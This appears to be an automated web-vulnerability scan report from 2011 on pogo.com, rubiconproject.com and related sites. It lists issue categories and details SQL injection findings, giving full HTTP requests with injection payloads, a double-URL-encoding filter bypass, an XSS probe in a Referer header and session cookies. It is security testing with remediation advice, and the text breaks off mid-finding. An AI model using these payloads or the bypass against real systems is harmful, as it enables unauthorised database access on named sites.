20.12. http://blog.pandora.com/pandora/archives/2006/09/

20.13. http://blog.pandora.com/pandora/archives/2006/10/

20.14. http://blog.pandora.com/pandora/archives/2006/12/

20.15. http://blog.pandora.com/pandora/archives/2007/02/

20.16. http://blog.pandora.com/pandora/archives/2007/04/

20.17. http://blog.pandora.com/pandora/archives/2007/05/

20.18. http://blog.pandora.com/pandora/archives/2007/06/

20.19. http://blog.pandora.com/pandora/archives/2007/07/

20.20. http://blog.pandora.com/pandora/archives/2007/08/

20.21. http://blog.pandora.com/pandora/archives/2008/01/

20.22. http://blog.pandora.com/pandora/archives/2008/02/

20.23. http://blog.pandora.com/pandora/archives/2008/05/

20.24. http://blog.pandora.com/pandora/archives/2008/06/

20.25. http://blog.pandora.com/pandora/archives/2008/07/

20.26. http://blog.pandora.com/pandora/archives/2008/08/

20.27. http://blog.pandora.com/pandora/archives/2008/09/

20.28. http://blog.pandora.com/pandora/archives/2008/10/

20.29. http://blog.pandora.com/pandora/archives/2009/07/

20.30. http://blog.pandora.com/pandora/archives/2010/06/

20.31. http://blog.pandora.com/pandora/archives/2010/11/

20.32. http://blog.pandora.com/pandora/archives/2010/11/fantastic-fargo.html

20.33. http://blog.pandora.com/pandora/archives/2010/11/town-halls-this.html

20.34. http://blog.pandora.com/pandora/archives/arizona/

20.35. http://blog.pandora.com/pandora/archives/california/

20.36. http://blog.pandora.com/pandora/archives/colorado/

20.37. http://blog.pandora.com/pandora/archives/florida/

20.38. http://blog.pandora.com/pandora/archives/georgia/

20.39. http://blog.pandora.com/pandora/archives/illinois/

20.40. http://blog.pandora.com/pandora/archives/indiana/

20.41. http://blog.pandora.com/pandora/archives/massachusetts/

20.42. http://blog.pandora.com/pandora/archives/michigan/

20.43. http://blog.pandora.com/pandora/archives/minnesota/

20.44. http://blog.pandora.com/pandora/archives/missouri/

20.45. http://blog.pandora.com/pandora/archives/new-york/

20.46. http://blog.pandora.com/pandora/archives/north-carolina/

20.47. http://blog.pandora.com/pandora/archives/ohio/

20.48. http://blog.pandora.com/pandora/archives/oregon/

20.49. http://blog.pandora.com/pandora/archives/pennsylvania/

20.50. http://blog.pandora.com/pandora/archives/rhode-island/

20.51. http://blog.pandora.com/pandora/archives/roadtrip/

20.52. http://blog.pandora.com/pandora/archives/roadtrip/index.html

20.53. http://blog.pandora.com/pandora/archives/texas/

20.54. http://blog.pandora.com/pandora/archives/virginia/

20.55. http://blog.pandora.com/pandora/archives/washington-dc/

20.56. http://blog.pandora.com/pandora/archives/washington/

20.57. http://blog.pandora.com/pandora/index.xml

20.58. http://blog.pandora.com/pandora/jquery.dimension.js

20.59. http://board-games.pogo.com/v/ERWvfg/include/js/shared/markup2.js

20.60. http://card-games.pogo.com/v/ERWvfg/include/js/shared/markup2.js

20.61. http://dean.edwards.name/weblog/2006/06/again/

20.62. http://download-games.pogo.com/deluxe.aspx

20.63. http://jqueryui.com/about

20.64. http://www.adobe.com/aboutadobe/contact.html

20.65. http://www.adobe.com/aboutadobe/invrelations/

20.66. http://www.adobe.com/cfusion/marketplace/index.cfm

20.67. http://www.adobe.com/technology/

20.68. http://www.cmsinter.net/

20.69. http://www.cmsinter.net/blog/

20.70. http://www.ea.com/ipad

20.71. http://www.ea.com/iphone

20.72. http://www.ea.com/mobile

20.73. http://www.freshnews.com/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc-

20.74. http://www.mlive.com/js/sitecatalyst/s_code.js

20.75. http://www.peanutlabs.com/core.php

20.76. http://www.peanutlabs.com/core.php

20.77. http://www.peanutlabs.com/media/case_studies.php

20.78. http://www.peanutlabs.com/media/company.php

20.79. http://www.peanutlabs.com/media/contact.php

20.80. http://www.peanutlabs.com/media/map.php

20.81. http://www.peanutlabs.com/media/privacy_policy.php

20.82. http://www.peanutlabs.com/media/publishers.php

20.83. http://www.peanutlabs.com/media/terms.php

20.84. http://www.peanutlabs.com/pl/privacyPolicy.php

20.85. http://www.peanutlabs.com/userGreeting.php

20.86. http://www.pogo.com/account/my-account/main.do

20.87. http://www.pogo.com/misc/advertise.jsp

20.88. http://www.pogo.com/prize/prize.do

20.89. http://www.pogo.com/v/ERWvfg/include/js/shared/markup2.js

20.90. http://www.pogo.com/v/ESf4UQ/js/lightreg.js

20.91. https://www.pogo.com/v/ERWvfg/include/js/shared/markup2.js

20.92. http://www.slidedeck.com/

21. Private IP addresses disclosed

21.1. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html

21.2. http://www.adobe.com/events/main.jsp

21.3. http://www.facebook.com/peanutlabs

21.4. http://www.gamespot.com/

21.5. http://www.weather.com/weather/local/48617

21.6. http://www.weather.com/weather/local/48858

21.7. http://www.weather.com/weather/local/48879

21.8. http://www.weather.com/weather/local/USMI0020

22. Credit card numbers disclosed

23. Cacheable HTTPS response

23.1. https://www.pogo.com/action/pogo/signin.do

23.2. https://www.pogo.com/action/pogop/heavyregview.do

23.3. https://www.pogo.com/fbconnect/getstatus.do

23.4. https://www.pogo.com/legal/us/gems-prem-album-ts.html

23.5. https://www.pogo.com/surveys/peanutlabsprocesssubs.do

23.6. https://www.pogo.com/surveys/processZipSubs.do

23.7. https://www.pogo.com/surveys/surveysofferssubs.do

23.8. https://www.pogo.com/v/DV37sw/include/css/pogo.css

24. HTML does not specify charset

24.1. http://ad.doubleclick.net/adi/N2998.Centro/B5116224.2

24.2. http://ad.doubleclick.net/adi/N3285.weather/B2343920.105

24.3. http://ad.doubleclick.net/adi/N3285.weather/B2343920.98

24.4. http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144

24.5. http://altfarm.mediaplex.com/ad/js/55290

24.6. http://assets.rubiconproject.com/static/rtb/sync-min.html

24.7. http://blog.pandora.com/

24.8. http://blog.pandora.com/pandora/archives/images/map.html

24.9. http://blog.pandora.com/pandora/assets_c/2010/11/North

24.10. http://blog.pandora.com/pandora/assets_c/2010/11/sd

24.11. http://bs.serving-sys.com/BurstingPipe/adServer.bs

24.12. http://download-games.pogo.com/Category.aspx

24.13. http://download-games.pogo.com/deluxe.aspx

24.14. http://download-games.pogo.com/game.htm

24.15. http://game3.pogo.com/blank.html

24.16. http://game3.pogo.com/room/util/silentclosepage.html

24.17. http://game3.pogo.com/v/11.1.9.13/applet/scrabble/

24.18. http://game3.pogo.com/v/11.1.9.44/applet/jvmtest/

24.19. http://jqueryui.com/about

24.20. http://jqueryui.com/themeroller/

24.21. http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js

24.22. http://www.e00.peanutlabs.com/js/iFrame/sc.php

24.23. http://www.e00.peanutlabs.com/recvMid.php

24.24. http://www.intellicast.com/Travel/CheapFlightsWidget.htm

24.25. http://www.pandora.com/facebook/xd_receiver.htm

24.26. http://www.pandora.com/include/backstageAdEmbed.html

24.27. http://www.pandora.com/include/communityAdEmbed.html

24.28. http://www.peanutlabs.com/generateUserId.php

24.29. http://www.peanutlabs.com/js/iFrame/sc.php

24.30. http://www.peanutlabs.com/recvMid.php

24.31. http://www.peanutlabs.com/sampleIframe.php

24.32. https://www.pogo.com/v/FEoeug/reg/stylesheets/flow_1/imagesreg%0Flow_1ot.png

24.33. http://www.thedailynews.cc/

24.34. http://www.thedailynews.cc/siteimages/featurephoto/cleardot.gif

24.35. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_1.jpg

24.36. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_2.jpg

24.37. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_3.jpg

24.38. http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_4.jpg

24.39. http://www1.peanutlabs.com/wp-content/themes/showtime/scripts/timthumb.php

25. Content type incorrectly stated

25.1. http://altfarm.mediaplex.com/ad/js/55290

25.2. http://board-games.pogo.com/img/header/main/en_US/pogo/header-home.jpg

25.3. http://board-games.pogo.com/include/js/java-detect.jsp

25.4. http://board-games.pogo.com/v/DV37sw/include/css/pogo.css

25.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.6. http://card-games.pogo.com/img/header/main/en_US/pogo/header-home.jpg

25.7. http://card-games.pogo.com/include/js/java-detect.jsp

25.8. http://card-games.pogo.com/v/DV37sw/include/css/pogo.css

25.9. http://download-games.pogo.com/Category.aspx

25.10. http://download-games.pogo.com/deluxe.aspx

25.11. http://event.adxpose.com/event.flow

25.12. http://game3.pogo.com/include/css/pogo.css

25.13. http://www.cmsinter.net/blog/wp-content/uploads/2011/01/image.jpeg

25.14. http://www.e00.peanutlabs.com/recvMid.php

25.15. http://www.facebook.com/extern/login_status.php

25.16. http://www.mlive.com/08design/images/regions_bar_image.gif

25.17. http://www.mlive.com/08design/images/regions_bar_statewide.gif

25.18. http://www.mlive.com/08design/images/samples/weather_map_thumbnail.jpg

25.19. http://www.mlive.com/favicon.ico

25.20. http://www.peanutlabs.com/publisher/dashboard2/framework_3.2.0.3958.swz

25.21. http://www.peanutlabs.com/recvMid.php

25.22. http://www.pogo.com/hotdeploy/us/homepage/img/clubpogo-info/Default-US_91710.jpg

25.23. http://www.pogo.com/img/header/main/en_US/pogo/header-home.jpg

25.24. http://www.pogo.com/include/css/pogo.css

25.25. http://www.pogo.com/include/js/java-detect.jsp

25.26. http://www.pogo.com/v/DV37sw/include/css/pogo.css

25.27. http://www.pogo.com/vl/img/misc/sidenav/en_US/pogo/s-icon-cash.png

25.28. http://www.pogo.com/vl/img/prize/en_US/pogo/daily-prize-drawings.gif

25.29. https://www.pogo.com/surveys/peanutlabsprocesssubs.do

25.30. https://www.pogo.com/v/DV37sw/include/css/pogo.css

25.31. http://www.slidedeck.com/wp-content/plugins/slidedeck/lib/slidedeck.jquery.js

25.32. http://www1.peanutlabs.com/wp-content/themes/showtime/scripts/timthumb.php

26. Content type is not specified

26.1. http://ads.bluelithium.com/st

26.2. http://adserving.cpxinteractive.com/st

26.3. http://board-games.pogo.com/favicon.ico

26.4. http://card-games.pogo.com/favicon.ico

26.5. http://click.linksynergy.com/fs-bin/stat

26.6. http://game3.pogo.com/favicon.ico

26.7. http://r.turn.com/favicon.ico

26.8. http://www.pogo.com/favicon.ico

26.9. https://www.pogo.com/favicon.ico

27. SSL certificate



1. SQL injection  next
There are 28 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://assets.rubiconproject.com/static/rtb/sync-min.html [REST URL parameter 3]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://assets.rubiconproject.com
Path:   /static/rtb/sync-min.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /static/rtb/sync-min.html'%20and%201%3d1--%20 HTTP/1.1
Host: assets.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4252/4762; rdk15=0; ses15=4762^1

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 234
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 09 Jan 2011 02:02:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html' and 1=1-- was not found o
...[SNIP]...
</p>
</body></html>

Request 2

GET /static/rtb/sync-min.html'%20and%201%3d2--%20 HTTP/1.1
Host: assets.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4252/4762; rdk15=0; ses15=4762^1

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 325
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 09 Jan 2011 02:02:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html' and 1=2-- was not found o
...[SNIP]...
</p>
<hr>
<address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address>
</body></html>

1.2. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://assets.rubiconproject.com
Path:   /static/rtb/sync-min.html/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /static/rtb'%20and%201%3d1--%20/sync-min.html/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rdk=4252/4762; ses15=4762^1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 235
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 09 Jan 2011 02:03:54 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb' and 1=1-- /sync-min.html/ was not found
...[SNIP]...
</p>
</body></html>

Request 2

GET /static/rtb'%20and%201%3d2--%20/sync-min.html/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rdk=4252/4762; ses15=4762^1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 326
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 09 Jan 2011 02:03:54 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb' and 1=2-- /sync-min.html/ was not found
...[SNIP]...
</p>
<hr>
<address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address>
</body></html>

1.3. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://assets.rubiconproject.com
Path:   /static/rtb/sync-min.html/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 21123539'%20or%201%3d1--%20 and 21123539'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /static/rtb/sync-min.html21123539'%20or%201%3d1--%20/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rdk=4252/4762; ses15=4762^1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 242
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 09 Jan 2011 02:03:55 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html21123539' or 1=1-- / was not
...[SNIP]...
</p>
</body></html>

Request 2

GET /static/rtb/sync-min.html21123539'%20or%201%3d2--%20/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rdk=4252/4762; ses15=4762^1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 333
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 09 Jan 2011 02:03:55 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html21123539' or 1=2-- / was not
...[SNIP]...
</p>
<hr>
<address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address>
</body></html>

1.4. http://clubpogo-games.pogo.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://clubpogo-games.pogo.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 17880153%20or%201%3d1--%20 and 17880153%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?117880153%20or%201%3d1--%20=1 HTTP/1.1
Host: clubpogo-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=65DADE84E709C901040324B63D290171.000033; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606376960931499; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:07:22 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:07:22 GMT
Server: Apache-Coyote/1.1
Content-Length: 104734


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<a class="navlink" href="http://www.pogo.com/action/pogo/createAccount.do?returnType=allGames&returnValue=allgames%7CplayersOnline%7Cnull&pageSection=header_reg" target="_top">Register</a></li>
               
               
               
               
           
               
               
               
               
               
               
               
               
               
               
               
               
               
                   
                   <li id="tn-downloads"><a class="navlink" href="http://download-games.pogo.com/?site=pogo&refid=headernav_fp_pogotab&ifw=756&pageSection=header_downloads&ifh=210&lkey=x" target="_top" id="downloads-link">Downloads</a></li>
               
               
               
               
               
               
           
               
               
               
               
               
               
               
               
               
               
               
               
               
               
               
               
               
                   
                   
                       <li id="tn-iphone">
                           <a href="/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp?pageSection=header_iphone" target="_top" class="navlink">IPHONE</a>
                       </li>
                   
               
               
           
       </ul>
   

</div>





<div id="page-wrapper" class="clearfix">
   
       

















<div id="stepSize" style="display:none;">20</div>
<div id="totalItems" style="display:none;">44</div>
<div id="removeFavoritesLocalizedText" style="display:none;">Remove from Favorites </div>
<div id="addFavoritesLocalizedText" style="display:none;">Add to Favorites</div>






   
       
       
   











   
       <div id="catBelt">
           <ul id="catList" class="items10">
               
                   
                       
                   
                   
               
               
                   
                   

                   <li id="allgames" >
                       
                           

<a href="http://www.pogo.com/all-games?pageSection=homecat_allgames">
                                   All Games
                               </a>
                           
                           
                           
                           
                           
                           
                           
                           
                           
                           
                           
                       
                   </li>
               
                   
                   

                   <li id="puzzle" >
                       
                           
                           

<a href="http://puzzle-games.pogo.com/?pageSection=homecat_puzzle">
                                   Puzzle<br/>Games
                               </a>
                           
                           
                           
                           
                           
                           
                           
                           
                           
                           
                       
                   </li>
               
                   
                   

                   <li id="board" >
                   
...[SNIP]...

Request 2

GET /?117880153%20or%201%3d2--%20=1 HTTP/1.1
Host: clubpogo-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=1CE604B86F6E71704329681DD1F7145C.000305; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606402730718127; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:07:22 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:07:22 GMT
Server: Apache-Coyote/1.1
Content-Length: 104744


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<a class="navlink" href="http://www.pogo.com/action/pogo/createAccount.do?returnType=allGames&returnValue=onlineFreeTrial%7CplayersOnline%7Cnull&pageSection=header_reg" target="_top">Register</a></li>
               
               
               
               
           
               
               
               
               
               
               
               
               
               
               
               
               
               
                   
                   <li id="tn-downloads"><a class="navlink" href="http://download-games.pogo.com/?site=pogo&refid=headernav_fp_pogotab&ifw=756&pageSection=header_downloads&ifh=210&lkey=x" target="_top" id="downloads-link">Downloads</a></li>
               
               
               
               
               
               
           
               
               
               
               
               
               
               
               
               
               
               
               
               
               
               
               
               
                   
                   
                       <li id="tn-iphone">
                           <a href="/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp?pageSection=header_iphone" target="_top" class="navlink">IPHONE</a>
                       </li>
                   
               
               
           
       </ul>
   

</div>





<div id="page-wrapper" class="clearfix">
   
       

















<div id="stepSize" style="display:none;">20</div>
<div id="totalItems" style="display:none;">44</div>
<div id="removeFavoritesLocalizedText" style="display:none;">Remove from Favorites </div>
<div id="addFavoritesLocalizedText" style="display:none;">Add to Favorites</div>






   
       
       
   











   
       <div id="catBelt">
           <ul id="catList" class="items10">
               
                   
                       
                   
                   
               
               
                   
                   

                   <li id="allgames" >
                       
                           

<a href="http://www.pogo.com/all-games?pageSection=homecat_allgames">
                                   All Games
                               </a>
                           
                           
                           
                           
                           
                           
                           
                           
                           
                           
                           
                       
                   </li>
               
                   
                   

                   <li id="puzzle" >
                       
                           
                           

<a href="http://puzzle-games.pogo.com/?pageSection=homecat_puzzle">
                                   Puzzle<br/>Games
                               </a>
                           
                           
                           
                           
                           
                           
                           
                           
                           
                           
                       
                   </li>
               
                   
                   

                   <li id="board"
...[SNIP]...

1.5. http://game3.pogo.com/room/game/game.jsp [ahst parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://game3.pogo.com
Path:   /room/game/game.jsp

Issue detail

The ahst parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ahst parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ahst request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /room/game/game.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&install=true&rspt=11909&ahst=game3.pogo.com%2527&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;

Response 1 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:15:33 GMT
Server: Apache-Coyote/1.1
Content-Length: 37804


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
s.linkTrackVars=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://game3.pogo.com/error/invalidurl.html";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authenti
...[SNIP]...

Request 2

